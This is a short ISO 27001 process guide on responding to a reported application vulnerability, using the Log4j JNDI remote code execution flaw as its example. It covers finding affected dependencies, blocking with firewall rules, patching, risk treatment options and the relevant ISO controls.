iso27diy-corp/Corpus/Information Security/Dealing with a reported application vulnerability.md

Dealing with a reported application vulnerability

Context

A vulnerability in a widely used open source library is published.

This is based on the Log4j vulnerability, december 2021, CVE-2021-44228

Log4j is a Java library maintained by the Apache Foundation, and the most popular logging library for Java.

The vulnerability is: user input containing JNDI Lookups is allowed, will be logged and evaluated, making an RCE attack possible. Disabling logging, while as a rule undesirable, plugs the hole. Source: https://logging.apache.org/log4j/2.x/

This vulnerability allows an attacker to run commands from a web server, unauthenticated (i.e. without needing to login).

Steps

1. Identifying exposure

• search your source code repositories for the name of the library
• use dependency tools (also called Software Composition Analysis or SCA) to identify indirect use of the affected library , like GitHub's dependencyGraph, Snyk,OWASP Dependency-Check, White source, etc.
• not all versions may be affected, so check which version of the library you are using
• find out if you are actually deploying the code that uses the vulnerability; if not, mark the code as "do not deploy". If it has, find out where.

2. Stopping the gap

• If the vulnerability is deployed behind a Web Application Firewall (WAF) or Content Delivery Network (CDN), or if you are using Runtime Application Self-Protection (RASP), add the rules your vendor provides to prevent RCE.
• If your vendor doesn't have rules available, search for them on the internet or write regex that blocks the attack.
• Monitor to make shure it's working.
• Update/patch the library containing the vulnerability as soon as it becomes available.

3. If you can't stop the gap

Do an impact analyses and identify a treatment:

• Option 1: Accept the Risk, keep monitoring the situation, spend your efforts on releasing the upgraded version of your software a.s.a.p.
• Option 2: Avoid the risk, by shutting down the vulnerable systems immediately — In this example (log4j), stop logging temporarily.
• Option 3: Mitigate the risk, by going through your code base, remove the dependency and comment out the code that calls it (uncomment it when the upgrade/patch has been applied).

Relevant ISO 27001 controls

The main control of interest here is ISO 27001 A 12.6.1 Management of technical vulnerabilities, which ensures timely awareness of vulnerabilities through ISO 27001 A 6.1.4 Contact with special interest groups, evaluation of an organization’s exposure, and having set ISO 27001 A 16.1.1 Responsibilities and procedures to enable a quick and effective response.

Stopping the gap:

• ISO 27001 A 13.1.1 Network controls
• ISO 27001 A 13.1.2 Security of network services
• ISO 27001 A 12.5.1 Installation of software on operational systems

Preventative measures:

• ISO 27001 A 12.6.2 Restrictions on software installation
• ISO 27001 A 14.1.1 Information security requirements analysis and specification
• ISO 27001 14.2.1 Secure development policy
• ISO 27001 A 14.2.7 Outsourced development
• ISO 27001 A 18 Compliance of systems